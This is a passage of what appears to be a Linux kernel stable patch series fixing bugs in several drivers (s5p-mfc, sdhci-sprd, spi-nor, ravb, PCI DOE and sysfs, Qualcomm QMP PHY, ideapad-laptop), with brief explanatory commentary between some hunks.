++				       ctx->state == MFCINST_FINISHING)) {
+ 		mb_entry = list_entry(ctx->src_queue.next, struct s5p_mfc_buf,
+ 									list);
+ 		if (mb_entry->flags & MFC_BUF_FLAG_USED) {
+@@ -1288,7 +1290,13 @@ static int enc_post_frame_start(struct s5p_mfc_ctx *ctx)
+ 		vb2_set_plane_payload(&mb_entry->b->vb2_buf, 0, strm_size);
+ 		vb2_buffer_done(&mb_entry->b->vb2_buf, VB2_BUF_STATE_DONE);
+ 	}
+-	if ((ctx->src_queue_cnt == 0) || (ctx->dst_queue_cnt == 0))
++
++	src_ready = true;
++	if (ctx->state == MFCINST_RUNNING && ctx->src_queue_cnt == 0)
++		src_ready = false;
++	if (ctx->state == MFCINST_FINISHING && ctx->ref_queue_cnt == 0)
++		src_ready = false;
++	if (!src_ready || ctx->dst_queue_cnt == 0)
+ 		clear_work_bit(ctx);
+ 
+ 	return 0;
+diff --git a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_opr_v6.c b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_opr_v6.c
+index 8227004f67469..c0df5ac9fcff2 100644
+--- a/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_opr_v6.c
++++ b/drivers/media/platform/samsung/s5p-mfc/s5p_mfc_opr_v6.c
+@@ -1060,7 +1060,7 @@ static int s5p_mfc_set_enc_params_h264(struct s5p_mfc_ctx *ctx)
+ 	}
+ 
+ 	/* aspect ratio VUI */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 5);
+ 	reg |= ((p_h264->vui_sar & 0x1) << 5);
+ 	writel(reg, mfc_regs->e_h264_options);
+@@ -1083,7 +1083,7 @@ static int s5p_mfc_set_enc_params_h264(struct s5p_mfc_ctx *ctx)
+ 
+ 	/* intra picture period for H.264 open GOP */
+ 	/* control */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 4);
+ 	reg |= ((p_h264->open_gop & 0x1) << 4);
+ 	writel(reg, mfc_regs->e_h264_options);
+@@ -1097,23 +1097,23 @@ static int s5p_mfc_set_enc_params_h264(struct s5p_mfc_ctx *ctx)
+ 	}
+ 
+ 	/* 'WEIGHTED_BI_PREDICTION' for B is disable */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x3 << 9);
+ 	writel(reg, mfc_regs->e_h264_options);
+ 
+ 	/* 'CONSTRAINED_INTRA_PRED_ENABLE' is disable */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 14);
+ 	writel(reg, mfc_regs->e_h264_options);
+ 
+ 	/* ASO */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 6);
+ 	reg |= ((p_h264->aso & 0x1) << 6);
+ 	writel(reg, mfc_regs->e_h264_options);
+ 
+ 	/* hier qp enable */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 8);
+ 	reg |= ((p_h264->open_gop & 0x1) << 8);
+ 	writel(reg, mfc_regs->e_h264_options);
+@@ -1134,7 +1134,7 @@ static int s5p_mfc_set_enc_params_h264(struct s5p_mfc_ctx *ctx)
+ 	writel(reg, mfc_regs->e_h264_num_t_layer);
+ 
+ 	/* frame packing SEI generation */
+-	readl(mfc_regs->e_h264_options);
++	reg = readl(mfc_regs->e_h264_options);
+ 	reg &= ~(0x1 << 25);
+ 	reg |= ((p_h264->sei_frame_packing & 0x1) << 25);
+ 	writel(reg, mfc_regs->e_h264_options);
+diff --git a/drivers/mmc/host/sdhci-sprd.c b/drivers/mmc/host/sdhci-sprd.c
+index bec3f9e3cd3fa..525f979e2a974 100644
+--- a/drivers/mmc/host/sdhci-sprd.c
++++ b/drivers/mmc/host/sdhci-sprd.c
+@@ -228,13 +228,15 @@ static inline void _sdhci_sprd_set_clock(struct sdhci_host *host,
+ 	div = ((div & 0x300) >> 2) | ((div & 0xFF) << 8);
+ 	sdhci_enable_clk(host, div);
+ 
+-	/* enable auto gate sdhc_enable_auto_gate */
+-	val = sdhci_readl(host, SDHCI_SPRD_REG_32_BUSY_POSI);
+-	mask = SDHCI_SPRD_BIT_OUTR_CLK_AUTO_EN |
+-	       SDHCI_SPRD_BIT_INNR_CLK_AUTO_EN;
+-	if (mask != (val & mask)) {
+-		val |= mask;
+-		sdhci_writel(host, val, SDHCI_SPRD_REG_32_BUSY_POSI);
++	/* Enable CLK_AUTO when the clock is greater than 400K. */
++	if (clk > 400000) {
++		val = sdhci_readl(host, SDHCI_SPRD_REG_32_BUSY_POSI);
++		mask = SDHCI_SPRD_BIT_OUTR_CLK_AUTO_EN |
++			SDHCI_SPRD_BIT_INNR_CLK_AUTO_EN;
++		if (mask != (val & mask)) {
++			val |= mask;
++			sdhci_writel(host, val, SDHCI_SPRD_REG_32_BUSY_POSI);
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 0cf1a1797ea32..2e0655c0b606f 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -1184,6 +1184,8 @@ spi_nor_find_best_erase_type(const struct spi_nor_erase_map *map,
+ 			continue;
+ 
+ 		erase = &map->erase_type[i];
++		if (!erase->size)
++			continue;
+ 
+ 		/* Alignment is not mandatory for overlaid regions */
+ 		if (region->offset & SNOR_OVERLAID_REGION &&
+diff --git a/drivers/mtd/spi-nor/gigadevice.c b/drivers/mtd/spi-nor/gigadevice.c
+index 119b38e6fc2a3..d57ddaf1525b3 100644
+--- a/drivers/mtd/spi-nor/gigadevice.c
++++ b/drivers/mtd/spi-nor/gigadevice.c
+@@ -8,19 +8,29 @@
+ 
+ #include "core.h"
+ 
+-static void gd25q256_default_init(struct spi_nor *nor)
++static int
++gd25q256_post_bfpt(struct spi_nor *nor,
++		   const struct sfdp_parameter_header *bfpt_header,
++		   const struct sfdp_bfpt *bfpt)
+ {
+ 	/*
+-	 * Some manufacturer like GigaDevice may use different
+-	 * bit to set QE on different memories, so the MFR can't
+-	 * indicate the quad_enable method for this case, we need
+-	 * to set it in the default_init fixup hook.
++	 * GD25Q256C supports the first version of JESD216 which does not define
++	 * the Quad Enable methods. Overwrite the default Quad Enable method.
++	 *
++	 * GD25Q256 GENERATION | SFDP MAJOR VERSION | SFDP MINOR VERSION
++	 *      GD25Q256C      | SFDP_JESD216_MAJOR | SFDP_JESD216_MINOR
++	 *      GD25Q256D      | SFDP_JESD216_MAJOR | SFDP_JESD216B_MINOR
++	 *      GD25Q256E      | SFDP_JESD216_MAJOR | SFDP_JESD216B_MINOR
+ 	 */
+-	nor->params->quad_enable = spi_nor_sr1_bit6_quad_enable;
++	if (bfpt_header->major == SFDP_JESD216_MAJOR &&
++	    bfpt_header->minor == SFDP_JESD216_MINOR)
++		nor->params->quad_enable = spi_nor_sr1_bit6_quad_enable;
++
++	return 0;
+ }
+ 
+ static const struct spi_nor_fixups gd25q256_fixups = {
+-	.default_init = gd25q256_default_init,
++	.post_bfpt = gd25q256_post_bfpt,
+ };
+ 
+ static const struct flash_info gigadevice_nor_parts[] = {
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 33f723a9f471b..b4e0fc7f65bdf 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -2903,12 +2903,12 @@ static int ravb_remove(struct platform_device *pdev)
+ 			  priv->desc_bat_dma);
+ 	/* Set reset mode */
+ 	ravb_write(ndev, CCC_OPC_RESET, CCC);
+-	pm_runtime_put_sync(&pdev->dev);
+ 	unregister_netdev(ndev);
+ 	if (info->nc_queues)
+ 		netif_napi_del(&priv->napi[RAVB_NC]);
+ 	netif_napi_del(&priv->napi[RAVB_BE]);
+ 	ravb_mdio_release(priv);
++	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	reset_control_assert(priv->rstc);
+ 	free_netdev(ndev);
+diff --git a/drivers/net/wireless/microchip/wilc1000/sdio.c b/drivers/net/wireless/microchip/wilc1000/sdio.c
+index 7390f94cd4ca2..a05bda7b9a3ba 100644
+--- a/drivers/net/wireless/microchip/wilc1000/sdio.c
++++ b/drivers/net/wireless/microchip/wilc1000/sdio.c
+@@ -20,6 +20,7 @@ static const struct sdio_device_id wilc_sdio_ids[] = {
+ 	{ SDIO_DEVICE(SDIO_VENDOR_ID_MICROCHIP_WILC, SDIO_DEVICE_ID_MICROCHIP_WILC1000) },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(sdio, wilc_sdio_ids);
+ 
+ #define WILC_SDIO_BLOCK_SIZE 512
+ 
+diff --git a/drivers/of/kexec.c b/drivers/of/kexec.c
+index e6c01db393f95..f26d2ba8a3715 100644
+--- a/drivers/of/kexec.c
++++ b/drivers/of/kexec.c
+@@ -281,7 +281,7 @@ void *of_kexec_alloc_and_setup_fdt(const struct kimage *image,
+ 				   const char *cmdline, size_t extra_fdt_size)
+ {
+ 	void *fdt;
+-	int ret, chosen_node;
++	int ret, chosen_node, len;
+ 	const void *prop;
+ 	size_t fdt_size;
+ 
+@@ -324,19 +324,19 @@ void *of_kexec_alloc_and_setup_fdt(const struct kimage *image,
+ 		goto out;
+ 
+ 	/* Did we boot using an initrd? */
+-	prop = fdt_getprop(fdt, chosen_node, "linux,initrd-start", NULL);
++	prop = fdt_getprop(fdt, chosen_node, "linux,initrd-start", &len);
+ 	if (prop) {
+ 		u64 tmp_start, tmp_end, tmp_size;
+ 
+-		tmp_start = fdt64_to_cpu(*((const fdt64_t *) prop));
++		tmp_start = of_read_number(prop, len / 4);
+ 
+-		prop = fdt_getprop(fdt, chosen_node, "linux,initrd-end", NULL);
++		prop = fdt_getprop(fdt, chosen_node, "linux,initrd-end", &len);
+ 		if (!prop) {
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 
+-		tmp_end = fdt64_to_cpu(*((const fdt64_t *) prop));
++		tmp_end = of_read_number(prop, len / 4);
+ 
+ 		/*
+ 		 * kexec reserves exact initrd size, while firmware may
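
The old code unconditionally dereferenced the property as a 64-bit big-endian value, which goes wrong when firmware writes linux,initrd-start/end as a single 32-bit cell. of_read_number() instead folds 'len / 4' cells into a u64; a self-contained user-space sketch of that folding (read_cells is a hypothetical stand-in for the kernel helper):

	#include <stdint.h>
	#include <arpa/inet.h>		/* ntohl(); FDT cells are big-endian */

	static uint64_t read_cells(const uint32_t *cell, int count)
	{
		uint64_t r = 0;

		while (count--)		/* one 4-byte cell at a time */
			r = (r << 32) | ntohl(*cell++);
		return r;
	}

With len == 4 this returns the single cell unchanged; with len == 8 it concatenates two cells into the full 64-bit address.
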
+diff --git a/drivers/parisc/led.c b/drivers/parisc/led.c
+index d4be9d2ee74d9..8bdc5e043831c 100644
+--- a/drivers/parisc/led.c
++++ b/drivers/parisc/led.c
+@@ -137,6 +137,9 @@ static int start_task(void)
+ 
+ 	/* Create the work queue and queue the LED task */
+ 	led_wq = create_singlethread_workqueue("led_wq");	
++	if (!led_wq)
++		return -ENOMEM;
++
+ 	queue_delayed_work(led_wq, &led_task, 0);
+ 
+ 	return 0;
+diff --git a/drivers/pci/doe.c b/drivers/pci/doe.c
+index e402f05068a53..66d9ab2886468 100644
+--- a/drivers/pci/doe.c
++++ b/drivers/pci/doe.c
+@@ -29,6 +29,9 @@
+ #define PCI_DOE_FLAG_CANCEL	0
+ #define PCI_DOE_FLAG_DEAD	1
+ 
++/* Max data object length is 2^18 dwords */
++#define PCI_DOE_MAX_LENGTH	(1 << 18)
++
+ /**
+  * struct pci_doe_mb - State for a single DOE mailbox
+  *
+@@ -107,6 +110,7 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ {
+ 	struct pci_dev *pdev = doe_mb->pdev;
+ 	int offset = doe_mb->cap_offset;
++	size_t length;
+ 	u32 val;
+ 	int i;
+ 
+@@ -123,15 +127,20 @@ static int pci_doe_send_req(struct pci_doe_mb *doe_mb,
+ 	if (FIELD_GET(PCI_DOE_STATUS_ERROR, val))
+ 		return -EIO;
+ 
++	/* Length is 2 DW of header + length of payload in DW */
++	length = 2 + task->request_pl_sz / sizeof(u32);
++	if (length > PCI_DOE_MAX_LENGTH)
++		return -EIO;
++	if (length == PCI_DOE_MAX_LENGTH)
++		length = 0;
++
+ 	/* Write DOE Header */
+ 	val = FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_1_VID, task->prot.vid) |
+ 		FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_1_TYPE, task->prot.type);
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_WRITE, val);
+-	/* Length is 2 DW of header + length of payload in DW */
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+ 			       FIELD_PREP(PCI_DOE_DATA_OBJECT_HEADER_2_LENGTH,
+-					  2 + task->request_pl_sz /
+-						sizeof(u32)));
++					  length));
+ 	for (i = 0; i < task->request_pl_sz / sizeof(u32); i++)
+ 		pci_write_config_dword(pdev, offset + PCI_DOE_WRITE,
+ 				       task->request_pl[i]);
+@@ -178,7 +187,10 @@ static int pci_doe_recv_resp(struct pci_doe_mb *doe_mb, struct pci_doe_task *tas
+ 	pci_write_config_dword(pdev, offset + PCI_DOE_READ, 0);
+ 
+ 	length = FIELD_GET(PCI_DOE_DATA_OBJECT_HEADER_2_LENGTH, val);
+-	if (length > SZ_1M || length < 2)
++	/* A value of 0x0 indicates max data object length */
++	if (!length)
++		length = PCI_DOE_MAX_LENGTH;
++	if (length < 2)
+ 		return -EIO;
+ 
+ 	/* First 2 dwords have already been read */
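
Both ends of the mailbox now agree on the DOE length encoding: the header's 18-bit Length field counts dwords, and the one value that cannot be represented, 2^18 itself, is sent as 0. A self-contained round-trip of that convention (helper names are illustrative only):

	#define PCI_DOE_MAX_LENGTH	(1 << 18)

	/* a full 2^18-dword object wraps to a Length field of 0 */
	static unsigned int doe_encode_length(size_t dwords)
	{
		return dwords == PCI_DOE_MAX_LENGTH ? 0 : dwords;
	}

	/* a Length field of 0 means the maximum object size */
	static size_t doe_decode_length(unsigned int field)
	{
		return field ? field : PCI_DOE_MAX_LENGTH;
	}
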
+diff --git a/drivers/pci/pci-sysfs.c b/drivers/pci/pci-sysfs.c
+index 0a2eeb82cebde..ba38fc47d35e9 100644
+--- a/drivers/pci/pci-sysfs.c
++++ b/drivers/pci/pci-sysfs.c
+@@ -1175,11 +1175,9 @@ static int pci_create_attr(struct pci_dev *pdev, int num, int write_combine)
+ 
+ 	sysfs_bin_attr_init(res_attr);
+ 	if (write_combine) {
+-		pdev->res_attr_wc[num] = res_attr;
+ 		sprintf(res_attr_name, "resource%d_wc", num);
+ 		res_attr->mmap = pci_mmap_resource_wc;
+ 	} else {
+-		pdev->res_attr[num] = res_attr;
+ 		sprintf(res_attr_name, "resource%d", num);
+ 		if (pci_resource_flags(pdev, num) & IORESOURCE_IO) {
+ 			res_attr->read = pci_read_resource_io;
+@@ -1197,10 +1195,17 @@ static int pci_create_attr(struct pci_dev *pdev, int num, int write_combine)
+ 	res_attr->size = pci_resource_len(pdev, num);
+ 	res_attr->private = (void *)(unsigned long)num;
+ 	retval = sysfs_create_bin_file(&pdev->dev.kobj, res_attr);
+-	if (retval)
++	if (retval) {
+ 		kfree(res_attr);
++		return retval;
++	}
++
++	if (write_combine)
++		pdev->res_attr_wc[num] = res_attr;
++	else
++		pdev->res_attr[num] = res_attr;
+ 
+-	return retval;
++	return 0;
+ }
+ 
+ /**
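
The pci-sysfs hunk is a publish-after-success fix: previously pdev->res_attr[num] was set before sysfs_create_bin_file() could fail, leaving a dangling pointer to freed memory on the error path. The general shape of the pattern (a sketch, not the driver's exact code):

	attr = kzalloc(sizeof(*attr), GFP_KERNEL);
	if (!attr)
		return -ENOMEM;

	retval = sysfs_create_bin_file(&pdev->dev.kobj, attr);
	if (retval) {
		kfree(attr);		/* never published, safe to free */
		return retval;
	}

	pdev->res_attr[num] = attr;	/* publish only after success */
	return 0;
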
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 2127aba3550b5..ab615ab4e4409 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -6447,6 +6447,8 @@ bool pci_device_is_present(struct pci_dev *pdev)
+ {
+ 	u32 v;
+ 
++	/* Check PF if pdev is a VF, since VF Vendor/Device IDs are 0xffff */
++	pdev = pci_physfn(pdev);
+ 	if (pci_dev_is_disconnected(pdev))
+ 		return false;
+ 	return pci_bus_read_dev_vendor_id(pdev->bus, pdev->devfn, &v, 0);
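
VFs read back all-ones from their Vendor/Device ID registers, so presence has to be probed through the parent PF. pci_physfn() resolves that parent; roughly what the linux/pci.h helper does, ignoring the !CONFIG_PCI_IOV stub (physfn_of is an illustrative name):

	static struct pci_dev *physfn_of(struct pci_dev *dev)
	{
		return dev->is_virtfn ? dev->physfn : dev;
	}
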
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+index ba9d761ec49a7..91f8ee79000df 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+@@ -1121,9 +1121,46 @@ static const struct qmp_phy_cfg sdm845_usb3phy_cfg = {
+ 	.pwrdn_delay_max	= POWER_DOWN_DELAY_US_MAX,
+ };
+ 
++static const struct qmp_phy_cfg sdm845_dpphy_cfg = {
++	.type			= PHY_TYPE_DP,
++	.lanes			= 2,
++
++	.serdes_tbl		= qmp_v3_dp_serdes_tbl,
++	.serdes_tbl_num		= ARRAY_SIZE(qmp_v3_dp_serdes_tbl),
++	.tx_tbl			= qmp_v3_dp_tx_tbl,
++	.tx_tbl_num		= ARRAY_SIZE(qmp_v3_dp_tx_tbl),
++
++	.serdes_tbl_rbr		= qmp_v3_dp_serdes_tbl_rbr,
++	.serdes_tbl_rbr_num	= ARRAY_SIZE(qmp_v3_dp_serdes_tbl_rbr),
++	.serdes_tbl_hbr		= qmp_v3_dp_serdes_tbl_hbr,
++	.serdes_tbl_hbr_num	= ARRAY_SIZE(qmp_v3_dp_serdes_tbl_hbr),
++	.serdes_tbl_hbr2	= qmp_v3_dp_serdes_tbl_hbr2,
++	.serdes_tbl_hbr2_num	= ARRAY_SIZE(qmp_v3_dp_serdes_tbl_hbr2),
++	.serdes_tbl_hbr3	= qmp_v3_dp_serdes_tbl_hbr3,
++	.serdes_tbl_hbr3_num	= ARRAY_SIZE(qmp_v3_dp_serdes_tbl_hbr3),
++
++	.swing_hbr_rbr		= &qmp_dp_v3_voltage_swing_hbr_rbr,
++	.pre_emphasis_hbr_rbr	= &qmp_dp_v3_pre_emphasis_hbr_rbr,
++	.swing_hbr3_hbr2	= &qmp_dp_v3_voltage_swing_hbr3_hbr2,
++	.pre_emphasis_hbr3_hbr2 = &qmp_dp_v3_pre_emphasis_hbr3_hbr2,
++
++	.clk_list		= qmp_v3_phy_clk_l,
++	.num_clks		= ARRAY_SIZE(qmp_v3_phy_clk_l),
++	.reset_list		= msm8996_usb3phy_reset_l,
++	.num_resets		= ARRAY_SIZE(msm8996_usb3phy_reset_l),
++	.vreg_list		= qmp_phy_vreg_l,
++	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
++	.regs			= qmp_v3_usb3phy_regs_layout,
++
++	.dp_aux_init = qcom_qmp_v3_phy_dp_aux_init,
++	.configure_dp_tx = qcom_qmp_v3_phy_configure_dp_tx,
++	.configure_dp_phy = qcom_qmp_v3_phy_configure_dp_phy,
++	.calibrate_dp_phy = qcom_qmp_v3_dp_phy_calibrate,
++};
++
+ static const struct qmp_phy_combo_cfg sdm845_usb3dpphy_cfg = {
+ 	.usb_cfg                = &sdm845_usb3phy_cfg,
+-	.dp_cfg                 = &sc7180_dpphy_cfg,
++	.dp_cfg                 = &sdm845_dpphy_cfg,
+ };
+ 
+ static const struct qmp_phy_cfg sm8150_usb3phy_cfg = {
+@@ -1184,8 +1221,8 @@ static const struct qmp_phy_cfg sc8180x_dpphy_cfg = {
+ 
+ 	.clk_list		= qmp_v3_phy_clk_l,
+ 	.num_clks		= ARRAY_SIZE(qmp_v3_phy_clk_l),
+-	.reset_list		= sc7180_usb3phy_reset_l,
+-	.num_resets		= ARRAY_SIZE(sc7180_usb3phy_reset_l),
++	.reset_list		= msm8996_usb3phy_reset_l,
++	.num_resets		= ARRAY_SIZE(msm8996_usb3phy_reset_l),
+ 	.vreg_list		= qmp_phy_vreg_l,
+ 	.num_vregs		= ARRAY_SIZE(qmp_phy_vreg_l),
+ 	.regs			= qmp_v3_usb3phy_regs_layout,
+@@ -1328,8 +1365,8 @@ static const struct qmp_phy_cfg sm8250_dpphy_cfg = {
+ 	.swing_hbr3_hbr2	= &qmp_dp_v3_voltage_swing_hbr3_hbr2,
+ 	.pre_emphasis_hbr3_hbr2 = &qmp_dp_v3_pre_emphasis_hbr3_hbr2,
+ 
+-	.clk_list		= qmp_v4_phy_clk_l,
+-	.num_clks		= ARRAY_SIZE(qmp_v4_phy_clk_l),
++	.clk_list		= qmp_v4_sm8250_usbphy_clk_l,
++	.num_clks		= ARRAY_SIZE(qmp_v4_sm8250_usbphy_clk_l),
+ 	.reset_list		= msm8996_usb3phy_reset_l,
+ 	.num_resets		= ARRAY_SIZE(msm8996_usb3phy_reset_l),
+ 	.vreg_list		= qmp_phy_vreg_l,
+diff --git a/drivers/platform/x86/ideapad-laptop.c b/drivers/platform/x86/ideapad-laptop.c
+index 3ea8fc6a9ca36..fc3d47a759443 100644
+--- a/drivers/platform/x86/ideapad-laptop.c
++++ b/drivers/platform/x86/ideapad-laptop.c
+@@ -30,6 +30,7 @@
+ #include <linux/seq_file.h>
+ #include <linux/sysfs.h>
+ #include <linux/types.h>
++#include <linux/wmi.h>
+ 
+ #include <acpi/video.h>
+ 
+@@ -37,20 +38,23 @@
+ 
+ #define IDEAPAD_RFKILL_DEV_NUM	3
+ 
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
+-static const char *const ideapad_wmi_fnesc_events[] = {
+-	"26CAB2E5-5CF1-46AE-AAC3-4A12B6BA50E6", /* Yoga 3 */
+-	"56322276-8493-4CE8-A783-98C991274F5E", /* Yoga 700 */
+-	"8FC0DE0C-B4E4-43FD-B0F3-8871711C1294", /* Legion 5 */
+-};
+-#endif
+-
+ enum {
+ 	CFG_CAP_BT_BIT       = 16,
+ 	CFG_CAP_3G_BIT       = 17,
+ 	CFG_CAP_WIFI_BIT     = 18,
+ 	CFG_CAP_CAM_BIT      = 19,
+-	CFG_CAP_TOUCHPAD_BIT = 30,
++
++	/*
++	 * These are OnScreenDisplay support bits that can be useful to determine
++	 * whether a hotkey exists/should show OSD. But they aren't particularly
++	 * meaningful since they were introduced later, i.e. 2010 IdeaPads
++	 * don't have these, but they still had OSD for hotkeys.
++	 */
++	CFG_OSD_NUMLK_BIT    = 27,
++	CFG_OSD_CAPSLK_BIT   = 28,
++	CFG_OSD_MICMUTE_BIT  = 29,
++	CFG_OSD_TOUCHPAD_BIT = 30,
++	CFG_OSD_CAM_BIT      = 31,
+ };
+ 
+ enum {
+@@ -130,7 +134,7 @@ struct ideapad_private {
+ 	struct ideapad_dytc_priv *dytc;
+ 	struct dentry *debug;
+ 	unsigned long cfg;
+-	const char *fnesc_guid;
++	unsigned long r_touchpad_val;
+ 	struct {
+ 		bool conservation_mode    : 1;
+ 		bool dytc                 : 1;
+@@ -140,6 +144,7 @@ struct ideapad_private {
+ 		bool hw_rfkill_switch     : 1;
+ 		bool kbd_bl               : 1;
+ 		bool touchpad_ctrl_via_ec : 1;
++		bool ctrl_ps2_aux_port    : 1;
+ 		bool usb_charging         : 1;
+ 	} features;
+ 	struct {
+@@ -171,6 +176,48 @@ MODULE_PARM_DESC(set_fn_lock_led,
+ 	"Enable driver based updates of the fn-lock LED on fn-lock changes. "
+ 	"If you need this please report this to: platform-driver-x86@vger.kernel.org");
+ 
++static bool ctrl_ps2_aux_port;
++module_param(ctrl_ps2_aux_port, bool, 0444);
++MODULE_PARM_DESC(ctrl_ps2_aux_port,
++	"Enable driver based PS/2 aux port en-/dis-abling on touchpad on/off toggle. "
++	"If you need this please report this to: platform-driver-x86@vger.kernel.org");
++
++/*
++ * shared data
++ */
++
++static struct ideapad_private *ideapad_shared;
++static DEFINE_MUTEX(ideapad_shared_mutex);
++
++static int ideapad_shared_init(struct ideapad_private *priv)
++{
++	int ret;
++
++	mutex_lock(&ideapad_shared_mutex);
++
++	if (!ideapad_shared) {
++		ideapad_shared = priv;
++		ret = 0;
++	} else {
++		dev_warn(&priv->adev->dev, "found multiple platform devices\n");
++		ret = -EINVAL;
++	}
++
++	mutex_unlock(&ideapad_shared_mutex);
++
++	return ret;
++}
++
++static void ideapad_shared_exit(struct ideapad_private *priv)
++{
++	mutex_lock(&ideapad_shared_mutex);
++
++	if (ideapad_shared == priv)
++		ideapad_shared = NULL;
++
++	mutex_unlock(&ideapad_shared_mutex);
++}
++
+ /*
+  * ACPI Helpers
+  */
+@@ -386,8 +433,19 @@ static int debugfs_cfg_show(struct seq_file *s, void *data)
+ 		seq_puts(s, " wifi");
+ 	if (test_bit(CFG_CAP_CAM_BIT, &priv->cfg))
+ 		seq_puts(s, " camera");
+-	if (test_bit(CFG_CAP_TOUCHPAD_BIT, &priv->cfg))
++	seq_puts(s, "\n");
++
++	seq_puts(s, "OSD support:");
++	if (test_bit(CFG_OSD_NUMLK_BIT, &priv->cfg))
++		seq_puts(s, " num-lock");
++	if (test_bit(CFG_OSD_CAPSLK_BIT, &priv->cfg))
++		seq_puts(s, " caps-lock");
++	if (test_bit(CFG_OSD_MICMUTE_BIT, &priv->cfg))
++		seq_puts(s, " mic-mute");
++	if (test_bit(CFG_OSD_TOUCHPAD_BIT, &priv->cfg))
+ 		seq_puts(s, " touchpad");
++	if (test_bit(CFG_OSD_CAM_BIT, &priv->cfg))
++		seq_puts(s, " camera");
+ 	seq_puts(s, "\n");
+ 
+ 	seq_puts(s, "Graphics: ");
+@@ -593,6 +651,8 @@ static ssize_t touchpad_show(struct device *dev,
+ 	if (err)
+ 		return err;
+ 
++	priv->r_touchpad_val = result;
++
+ 	return sysfs_emit(buf, "%d\n", !!result);
+ }
+ 
+@@ -612,6 +672,8 @@ static ssize_t touchpad_store(struct device *dev,
+ 	if (err)
+ 		return err;
+ 
++	priv->r_touchpad_val = state;
++
+ 	return count;
+ }
+ 
+@@ -680,8 +742,7 @@ static umode_t ideapad_is_visible(struct kobject *kobj,
+ 	else if (attr == &dev_attr_fn_lock.attr)
+ 		supported = priv->features.fn_lock;
+ 	else if (attr == &dev_attr_touchpad.attr)
+-		supported = priv->features.touchpad_ctrl_via_ec &&
+-			    test_bit(CFG_CAP_TOUCHPAD_BIT, &priv->cfg);
++		supported = priv->features.touchpad_ctrl_via_ec;
+ 	else if (attr == &dev_attr_usb_charging.attr)
+ 		supported = priv->features.usb_charging;
+ 
+@@ -1089,6 +1150,8 @@ static void ideapad_sysfs_exit(struct ideapad_private *priv)
+ /*
+  * input device
+  */
++#define IDEAPAD_WMI_KEY 0x100
++
+ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_KEY,   6, { KEY_SWITCHVIDEOMODE } },
+ 	{ KE_KEY,   7, { KEY_CAMERA } },
+@@ -1101,7 +1164,30 @@ static const struct key_entry ideapad_keymap[] = {
+ 	{ KE_KEY,  65, { KEY_PROG4 } },
+ 	{ KE_KEY,  66, { KEY_TOUCHPAD_OFF } },
+ 	{ KE_KEY,  67, { KEY_TOUCHPAD_ON } },
++	{ KE_KEY,  68, { KEY_TOUCHPAD_TOGGLE } },
+ 	{ KE_KEY, 128, { KEY_ESC } },
++
++	/*
++	 * WMI keys
++	 */
++
++	/* FnLock (handled by the firmware) */
++	{ KE_IGNORE,	0x02 | IDEAPAD_WMI_KEY },
++	/* Esc (handled by the firmware) */
++	{ KE_IGNORE,	0x03 | IDEAPAD_WMI_KEY },
++	/* Customizable Lenovo Hotkey ("star" with 'S' inside) */
++	{ KE_KEY,	0x01 | IDEAPAD_WMI_KEY, { KEY_FAVORITES } },
++	/* Dark mode toggle */
++	{ KE_KEY,	0x13 | IDEAPAD_WMI_KEY, { KEY_PROG1 } },
++	/* Sound profile switch */
++	{ KE_KEY,	0x12 | IDEAPAD_WMI_KEY, { KEY_PROG2 } },
++	/* Lenovo Virtual Background application */
++	{ KE_KEY,	0x28 | IDEAPAD_WMI_KEY, { KEY_PROG3 } },
++	/* Lenovo Support */
++	{ KE_KEY,	0x27 | IDEAPAD_WMI_KEY, { KEY_HELP } },
++	/* Refresh Rate Toggle */
++	{ KE_KEY,	0x0a | IDEAPAD_WMI_KEY, { KEY_DISPLAYTOGGLE } },
++
+ 	{ KE_END },
+ };
+ 
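The OR with IDEAPAD_WMI_KEY (0x100) keeps the WMI scancodes disjoint from the 0-128 codes the ACPI/EC path already uses, so a single sparse keymap can serve both event sources. A hypothetical event flow, reusing the driver's own report helper:

	/* a WMI fn-key event carrying scancode 0x13 arrives ... */
	ideapad_input_report(priv, 0x13 | IDEAPAD_WMI_KEY);
	/* ... 0x113 matches the entry above and emits KEY_PROG1 */
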
+@@ -1414,26 +1500,41 @@ static void ideapad_kbd_bl_exit(struct ideapad_private *priv)
+ /*
+  * module init/exit
+  */
+-static void ideapad_sync_touchpad_state(struct ideapad_private *priv)
++static void ideapad_sync_touchpad_state(struct ideapad_private *priv, bool send_events)
